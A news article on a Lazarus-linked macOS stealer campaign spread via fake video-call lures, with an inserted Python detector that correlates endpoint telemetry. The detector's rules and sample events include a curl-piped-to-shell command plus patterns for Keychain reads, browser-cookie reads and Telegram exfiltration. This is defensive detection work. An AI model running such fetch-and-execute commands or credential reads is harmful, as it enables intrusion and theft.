A new macOS malware campaign, dubbed "Mach-O Man," has been linked to the Lazarus Group, the North Korea-backed cybercriminal organization responsible for major cryptocurrency thefts.

Security researchers report the malware is distributed through social engineering schemes involving fake Zoom or Google Meet calls. Victims are tricked into executing commands that download the malware, allowing attackers to gain access to credentials and corporate systems.

- Figure 1 -

The "Mach-O Man" kit's final stage is a stealer designed to extract sensitive data, including browser credentials, cookies, and macOS Keychain entries. This information is then exfiltrated via Telegram.
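The two behaviours described above (a pasted command that fetches and runs a remote script, then a stealer that reads browser secrets and the login Keychain and talks to Telegram) are each individually noisy but easy to correlate on a host. The following detector is an added example written for this page; it is not code from the researchers who reported the campaign or from the article. It runs a handful of heuristic rules over constructed endpoint telemetry events (process, file and network records of the kind an EDR or macOS unified-log collector emits; every field name, process name and path below is an assumption) and escalates any pid that trips two or more distinct rules.

```python
"""Heuristic host detector for the stealer chain described in the article.

All event field names, process names and sample values are assumptions made
for this example; adapt them to whatever your telemetry collector emits.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# A download tool piped straight into a shell, spawned from an interactive
# terminal: the shape of the "run this command to fix your call" lure.
REMOTE_EXEC_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh)\b", re.I)
TERMINALS = {"Terminal", "iTerm2"}
# Telegram Bot API host; assumes the collector records the destination hostname/SNI.
TELEGRAM_API_HOST = "api.telegram.org"
KEYCHAIN_SUFFIXES = ("login.keychain-db", "login.keychain")
BROWSER_SECRET_FILES = ("Cookies", "Login Data", "cookies.sqlite", "logins.json")
# Processes that legitimately touch those files; extend with your own baseline.
BROWSER_PROCESSES = {"Google Chrome", "Safari", "firefox", "Brave Browser"}
KEYCHAIN_CLIENTS = {"securityd", "security", "Keychain Access"}


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    process: str
    detail: str


def check_event(ev):
    """Return a Finding for one telemetry event, or None if it looks benign."""
    kind, pid, proc = ev["type"], ev["pid"], ev["process"]
    if kind == "process":
        if ev.get("parent") in TERMINALS and REMOTE_EXEC_RE.search(ev.get("cmdline", "")):
            return Finding("remote-script-exec", pid, proc, ev["cmdline"])
    elif kind == "file":
        path = ev["path"]
        if path.endswith(KEYCHAIN_SUFFIXES) and proc not in KEYCHAIN_CLIENTS:
            return Finding("keychain-file-read", pid, proc, path)
        if path.endswith(BROWSER_SECRET_FILES) and proc not in BROWSER_PROCESSES:
            return Finding("browser-secret-read", pid, proc, path)
    elif kind == "network":
        if ev.get("host") == TELEGRAM_API_HOST and proc != "Telegram":
            return Finding("telegram-api-from-nonclient", pid, proc, ev["host"])
    return None


def analyze(events):
    """Run every rule, then correlate: a pid hitting two or more distinct rules is escalated."""
    findings = [f for f in map(check_event, events) if f]
    rules_by_pid = defaultdict(set)
    for f in findings:
        rules_by_pid[f.pid].add(f.rule)
    escalated = sorted(pid for pid, rules in rules_by_pid.items() if len(rules) >= 2)
    return findings, escalated


# Constructed telemetry for demonstration only; not data from the real campaign.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4242, "process": "zsh", "parent": "Terminal",
     "cmdline": "curl -fsSL https://example.invalid/script | sh"},
    {"type": "file", "pid": 4243, "process": "update",
     "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"type": "file", "pid": 4243, "process": "update",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
    {"type": "network", "pid": 4243, "process": "update", "host": "api.telegram.org"},
    # Benign look-alikes that must not fire.
    {"type": "file", "pid": 88, "process": "Google Chrome",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
    {"type": "network", "pid": 91, "process": "Telegram", "host": "api.telegram.org"},
    {"type": "process", "pid": 95, "process": "zsh", "parent": "Terminal",
     "cmdline": "curl -sI https://example.invalid/"},
]

if __name__ == "__main__":
    findings, escalated = analyze(SAMPLE_EVENTS)
    for f in findings:
        print(f"[{f.rule}] pid={f.pid} {f.process}: {f.detail}")
    print("escalated pids:", escalated)
```

Each rule on its own would page an analyst too often (developers pipe curl into sh, browsers read their own cookie stores, the Telegram desktop client talks to its API), which is why the escalation step keys on the combination rather than any single hit. Keychain and browser-profile reads are best sourced from file-open events rather than polling, and the Telegram rule assumes you can see the destination hostname; on encrypted traffic that usually means SNI or DNS telemetry.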

- Figure 2 -

The campaign's expansion beyond crypto-native companies highlights Lazarus Group's evolving targeting strategies. The group has been implicated in some of the largest crypto hacks to date, including a $1.4 billion exchange hack in 2025.